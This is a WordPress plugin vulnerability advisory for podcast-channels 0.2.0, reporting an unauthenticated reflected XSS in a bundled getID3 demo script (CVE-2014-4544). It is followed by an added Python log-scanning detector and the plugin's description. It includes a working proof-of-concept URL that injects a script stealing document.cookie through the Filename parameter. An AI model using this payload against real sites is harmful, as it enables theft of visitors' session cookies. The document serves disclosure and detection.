wp-plugin : podcast-channels – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : podcast-channels

 

Affected Version : 0.2.0 (and most probably lower versions, if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wp-plugs/podcastchannels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
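
An added example, not part of the original advisory or the plugin's code: a Python check that scans web server access logs for requests to the bundled getID3 demo scripts whose decoded query values contain HTML metacharacters, as the Filename parameter in the PoC does. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Path taken from the advisory's PoC: any script under the bundled getid3/demos/.
DEMO_PATH_RE = re.compile(r'/getid3/demos/[^/]+\.php$', re.IGNORECASE)
# Characters that let a value close an HTML attribute or open a new tag.
HTML_META_RE = re.compile(r'[<>"\']')


def suspicious_params(target):
    """Return (name, decoded value) pairs with HTML metacharacters sent to a getID3 demo script."""
    parts = urlsplit(target)
    if not DEMO_PATH_RE.search(parts.path):
        return []
    # parse_qsl percent-decodes once, like the value PHP exposes in $_GET.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return [(name, value) for name, value in pairs if HTML_META_RE.search(value)]


def scan(log_lines):
    """Return (line_number, name, decoded_value) for every flagged parameter."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        for name, value in suspicious_params(match.group(1)):
            hits.append((number, name, value))
    return hits


# Constructed sample log lines (not real traffic); line 2 carries the PoC from this advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Apr/2014:10:00:01 +0000] "GET /wordpress/wp-content/wp-plugs/podcastchannels/getid3/demos/demo.write.php?Filename=episode01.mp3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [25/Apr/2014:10:00:07 +0000] "GET /wordpress/wp-content/wp-plugs/podcastchannels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1" 200 5200',
    '192.0.2.10 - - [25/Apr/2014:10:00:09 +0000] "GET /wordpress/?s=%3Cb%3E HTTP/1.1" 200 830',
]

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name}={value!r}")
```

The check only covers query-string parameters on GET, POST and HEAD request lines; values sent in a POST body do not appear in a standard access log.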

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-22

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4544

 
Plugin Description :
 
What do you need to podcast with Wordpress? Nothing -- Wordpress puts enclosures in the feed for you. That's the bare bones and it works well enough.

But iTunes metadata would be nice. And, how about different info in different categories? Podcast Channels lets you specify iTunes metadata for the home feed, specific category feeds, and even 'user defined' ('Conditional') feeds (see the FAQ).

= Setting up Category Channels =
Go to the 'Media > Podcast Channels' page to set up the Site Defaults (it's 'Manage > Podcast Channels' for pre-2.7 WP). If you are not happy with the defaults shown in grey, click in the fields to set your own. If you want the main blog page feed to use this data, tick the 'add to Home Feed' option.

To add a podcast channel, choose a blog category from the drop-down menu and click 'Add Category Channel'. When the new channel pops up, there is an 'Add field...' drop-down menu in it that lets you specify defaults for this channel that over-ride the site defaults.

Leave a field undefined/blank or the same as the default and it will be removed from the channel definition - which means the value reverts to the site default.

= Fields that don't inherit =
Two fields are channel specific and do not inherit from the site defaults:

'Feed Moving To' is used to tell your podcast users (and the iTunes directory) that the podcast channel is moving to a new URL.

'Feedburner URL' redirects everyone (except the Feedburner site!) to a Feedburner URL so that they can collect stats for you.

= Audio Files in the Media Library =
When you upload an audio file, Podcast Channels adds 'Artist', 'Duration' and 'Explicit' fields to the Media Library. It initially fills in the artist and duration with the information found in the ID3 tags, but you are free to edit the fields.

Remember to set the explicit flag to 'Yes' if the content is not suitable for children. Apple are likely to de-list your podcast from the iTunes directory if you do not.


= Copyright and Image =
Podcast Channels adds image and copyright info to all your feeds if you specify it in the extra fields in 'Settings > General' (see screenshots).
